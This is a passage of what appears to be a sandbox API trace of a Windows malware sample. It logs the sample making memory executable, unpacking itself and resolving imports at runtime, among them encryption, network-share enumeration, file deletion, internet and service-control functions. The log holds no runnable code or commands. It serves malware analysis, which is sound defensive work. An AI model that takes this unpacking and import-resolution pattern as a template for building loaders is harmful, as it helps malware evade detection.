lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.487] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.487] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.487] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.487] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.487] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.487] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0087.107] lstrcatA (in: lpString1="", lpString2="kernel32.dll" | out: lpString1="kernel32.dll") returned="kernel32.dll" [0087.108] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0087.108] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0087.108] LocalAlloc (uFlags=0x0, uBytes=0x90f60) returned 0x220020 [0087.147] VirtualProtect (in: lpAddress=0x220020, dwSize=0x90f60, flNewProtect=0x40, lpflOldProtect=0x18f030 | out: lpflOldProtect=0x18f030*=0x4) returned 1 [0087.194] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0087.194] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0087.194] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0087.194] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0087.194] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0087.194] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0087.195] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0087.195] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0087.195] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0087.197] Module32First (hSnapshot=0x58, lpme=0x18edc0) returned 1 [0087.198] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x1e90000 [0087.237] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0087.237] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0087.237] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0087.238] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0087.238] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0087.238] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0087.238] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0087.238] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0087.238] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0087.238] SetErrorMode (uMode=0x400) returned 0x0 [0087.238] SetErrorMode (uMode=0x0) returned 0x400 [0087.238] GetVersionExA (in: lpVersionInformation=0x18dcf0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18dcf0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.238] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1fb0000 [0087.256] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ed78 | out: lpflOldProtect=0x18ed78*=0x2) returned 1 [0087.471] VirtualFree (lpAddress=0x1fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.477] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0087.477] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0087.477] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0087.477] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0087.477] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0087.477] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0087.477] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75660000 [0087.855] GetProcAddress (hModule=0x75660000, lpProcName="WNetOpenEnumW") returned 0x75662f06 [0087.855] GetProcAddress (hModule=0x75660000, lpProcName="WNetEnumResourceW") returned 0x75663058 [0087.855] GetProcAddress (hModule=0x75660000, lpProcName="WNetCloseEnum") returned 0x75662dd6 [0087.855] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0092.596] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0092.596] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0092.596] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0092.596] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0092.597] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0092.597] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0092.597] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0092.597] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75620000 [0092.910] GetProcAddress (hModule=0x75620000, lpProcName="timeGetTime") returned 0x756226e0 [0092.910] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0092.910] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0092.910] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0092.911] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0092.911] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0092.911] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0092.911] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0092.911] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0092.911] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0092.911] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0092.911] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0092.911] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0092.912] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0092.912] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0092.912] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0092.912] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0092.912] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0092.912] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0092.912] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0092.912] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0092.912] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0092.912] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0092.913] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0092.913] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0092.913] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0092.913] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0092.913] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0092.913] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0092.913] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0092.913] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0092.913] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0092.913] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0092.914] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0092.914] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0092.914] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0092.914] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0092.914] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0092.914] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0092.914] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0092.914] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0092.914] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0092.914] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0092.914] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0092.915] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0092.915] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0092.915] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0092.915] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0092.915] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0092.915] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0092.915] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0092.915] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0092.915] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0092.915] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0092.916] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0092.916] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0092.916] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0092.916] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0092.916] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0092.916] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0092.916] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0092.916] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0092.916] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0092.916] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0092.917] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0092.917] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0092.917] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0092.917] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0092.917] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0092.917] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0092.917] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0092.918] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0092.918] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0092.918] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0092.918] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0092.918] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0092.918] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0092.918] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0092.918] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0092.918] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0092.918] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0092.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0092.919] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0092.919] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0092.919] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0092.919] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0092.919] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0092.919] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0092.919] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0092.919] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0092.919] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0092.920] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0092.920] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0092.920] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0092.920] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0092.920] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0092.920] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0092.920] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0092.920] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0092.920] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0092.920] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0092.921] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0092.921] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0092.921] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0092.921] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0092.921] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0092.921] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0092.921] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0092.921] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0092.921] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0092.921] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0092.921] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0092.922] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0092.922] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0092.922] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0092.922] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0092.922] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0092.922] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0092.922] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0092.922] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0092.922] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0092.922] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0092.923] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0092.923] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0092.923] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0092.923] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0092.923] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0092.923] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0092.923] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0092.923] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0092.923] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0092.923] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0092.923] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0092.924] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0092.924] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0092.924] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0092.924] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0092.924] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0092.924] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0092.924] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0092.924] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0092.924] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0092.925] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0092.925] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0092.925] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0092.925] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0092.925] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0092.925] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0092.925] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0092.925] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0092.925] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0092.925] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0092.926] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0092.926] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0092.926] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0092.926] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0092.926] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0092.926] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0092.926] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0092.926] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0092.926] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0092.926] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0092.926] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0092.927] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0092.927] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0092.927] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0092.927] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0092.927] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0092.927] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0092.927] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0092.927] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0092.927] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0092.928] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0092.928] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0092.928] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0092.928] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0092.928] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0092.928] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0092.928] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0092.928] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0092.928] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0092.928] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0092.929] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0092.929] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0092.929] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0092.929] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0092.929] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0092.929] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0092.929] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0092.929] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0092.929] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0095.287] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0095.287] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0095.288] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0095.288] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0095.288] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0095.288] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0095.288] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0095.288] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0095.288] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0095.288] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0095.288] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0095.289] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0095.289] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0095.289] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0095.289] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0095.289] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0095.289] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0095.289] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0095.289] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0095.289] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0095.289] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75600000 [0095.587] GetProcAddress (hModule=0x75600000, lpProcName="GetAdaptersInfo") returned 0x75609263 [0095.587] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0096.022] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0096.022] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0096.022] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0096.022] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x755a0000 [0096.229] GetProcAddress (hModule=0x755a0000, lpProcName="DnsFree") returned 0x755a436b [0096.229] GetProcAddress (hModule=0x755a0000, lpProcName="DnsQuery_W") returned 0x755b572c [0096.229] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0096.229] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0096.229] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0096.229] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0096.229] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0096.229] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0096.230] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0096.230] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0096.230] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0096.230] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0096.230] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0096.230] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0096.230] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0096.230] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754e0000 [0097.046] GetProcAddress (hModule=0x754e0000, lpProcName="atexit") returned 0x754fc544 